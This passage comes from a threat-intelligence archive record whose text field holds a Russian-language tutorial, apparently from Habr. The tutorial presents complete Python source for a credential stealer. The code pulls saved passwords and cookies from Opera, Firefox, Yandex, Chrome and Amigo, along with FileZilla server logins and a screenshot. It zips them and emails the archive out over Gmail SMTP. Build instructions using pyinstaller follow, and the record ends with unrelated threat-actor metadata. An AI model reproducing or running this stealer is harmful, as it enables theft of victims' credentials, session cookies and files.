Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n 
url = result[1]\r\n textamc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textamc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\amigo_cookies.txt', \"w+\")\r\nfile.write(str(Amigo_c()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# OPERA PASSWORDS #\r\n################################################################################\r\ndef Opera():\r\n texto = 'Passwords Opera:' + '\\n'\r\n texto += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data', os.getenv(\"APPDATA\") +\r\n conn = sqlite3.connect(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n texto += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\opera_pass.txt', \"w+\")\r\nfile.write(str(Opera()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# FIREFOX PASSWORDS #\r\n################################################################################\r\ndef Firefox_cookies():\r\n texto = 'Passwords firefox:' + '\\n'\r\n texto += 'URL | LOGIN | PASSWORD' + '\\n'\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 15 of 20\n\nif os.path.exists(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox'):\r\n shutil.copy2(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox2', os.getenv(\"APPDATA\") + '\\\\Ap\r\n conn = sqlite3.connect(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox2')\r\n cursor = 
conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n texto += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\firefox_pass.txt', \"w+\")\r\nfile.write(str(Firefox_cookies()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# YANDEX PASSWORDS #\r\n################################################################################\r\ndef Yandexpass():\r\n textyp = 'Passwords Yandex:' + '\\n'\r\n textyp += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Login Data.db\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Login Data.db'\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandexe\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Log\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n textyp += url + ' | ' + login + ' | ' + password + '\\n'\r\n return textyp\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\yandex_passwords.txt', \"w+\")\r\nfile.write(str(Yandexpass()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# OPERA cookies #\r\n################################################################################\r\ndef Opera_c():\r\n textoc ='Cookies Opera:' + '\\n'\r\n textoc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User 
Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCAL\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 16 of 20\n\ncookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textoc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textoc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\opera_cookies.txt', \"w+\")\r\nfile.write(str(Opera_c()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# FILEZILLA #\r\n################################################################################\r\ndef filezilla():\r\n try:\r\n data = ''\r\n if os.path.isfile(os.getenv(\"APPDATA\") + '\\\\FileZilla\\\\recentservers.xml') is True:\r\n root = etree.parse(os.getenv(\"APPDATA\") + '\\\\FileZilla\\\\recentservers.xml').getroot()\r\n for i in range(len(root[0])):\r\n host = root[0][i][0].text\r\n port = root[0][i][1].text\r\n user = root[0][i][4].text\r\n password = base64.b64decode(root[0][i][5].text).decode('utf-8')\r\n data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\\n'\r\n return data\r\n else:\r\n return 'Not found'\r\n except Exception:\r\n return 'Error'\r\ntextfz = filezilla()\r\ntextfz += 'Filezilla: ' + '\\n' + filezilla() + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\filezilla.txt', \"w+\")\r\nfile.write(str(filezilla()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# SCREEN #\r\n################################################################################\r\nscreen = 
ImageGrab.grab()\r\nscreen.save(os.getenv(\"APPDATA\") + '\\\\sreenshot.jpg')\r\n################################################################################\r\n# PACKING TO ZIP #\r\n################################################################################\r\nzname = r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Local\\\\Temp\\\\LOG.zip'\r\nNZ = zipfile.ZipFile(zname,'w')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\firefox_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\firefox_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\yandex_passwords.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\alldata.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\google_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\google_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\chromium.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\chromium_cookies.txt')\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 17 of 20\n\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\amigo_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\amigo_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\opera_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\opera_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\filezilla.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\sreenshot.jpg')\r\nNZ.close()\r\n################################################################################\r\n# DOC-НАШ ZIP 
#\r\n################################################################################\r\ndoc = 'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Local\\\\Temp\\\\LOG.zip'\r\n################################################################################\r\n# ОТПРАВКА #\r\n################################################################################\r\n'↑Stealler by Andrew_Shipunov↑'.encode('utf-8')\r\nmsgtext = MIMEText('↑Stealler by Andrew_Shipunov↑'.encode('utf-8'), 'plain', 'utf-8')\r\nmsg = MIMEMultipart()\r\nmsg['From'] = 'ваша новая почта@gmail.com'\r\nmsg['To'] = 'почта куда отправится'\r\nmsg['Subject'] = getpass.getuser() + '-PC'\r\nmsg.attach(msgtext)\r\n################################################################################\r\n# СОЗДАНИЕ ВЛОЖЕНИЯ #\r\n################################################################################\r\npart = MIMEBase('application', \"zip\")\r\nb = open(doc, \"rb\").read()\r\nbs = encodebytes(b).decode()\r\npart.set_payload(bs)\r\npart.add_header('Content-Transfer-Encoding', 'base64')\r\npart.add_header('Content-Disposition', 'attachment; filename=\"LOG.zip\"')\r\nmsg.attach(part)\r\n################################################################################\r\n# ОТПРАВКА вам #\r\n################################################################################\r\ns = smtplib.SMTP('smtp.gmail.com', 587)\r\ns.starttls()\r\ns.login('новая ваша почта гмаил', 'пароль от новой почты гмаил')\r\ns.sendmail('новая ваша почта гмаил', 'почта куда отправится', msg.as_string())\r\ns.quit()\r\ni = input()\r\nВот что пришло.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 18 of 20\n\nВот что в архиве.\r\nВ тхт Alldata.\r\nСборка.\r\nОткрываете cmd консоль и пишете cd и путь к папке где лежит ваш файл с кодом, ентер.\r\ncd и путь к файлу.\r\nТеперь pyinstaller --onefile название вашего файла.py, ентер.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 19 of 20\n\nСсылки\r\nm228228 — Пишите мне в вк если что-то не 
работает, у самого постоянно ошибки лезут XD.\r\n@AndrewJess — или тут спрашивайте.\r\nSource: https://habr.com/en/sandbox/135410/\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://habr.com/en/sandbox/135410/"
	],
	"report_names": [
		"135410"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434329,
	"ts_updated_at": 1775826762,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8fed81b350197ad3e99eff56cda2e1e958498825.pdf",
		"text": "https://archive.orkl.eu/8fed81b350197ad3e99eff56cda2e1e958498825.txt",
		"img": "https://archive.orkl.eu/8fed81b350197ad3e99eff56cda2e1e958498825.jpg"
	}
}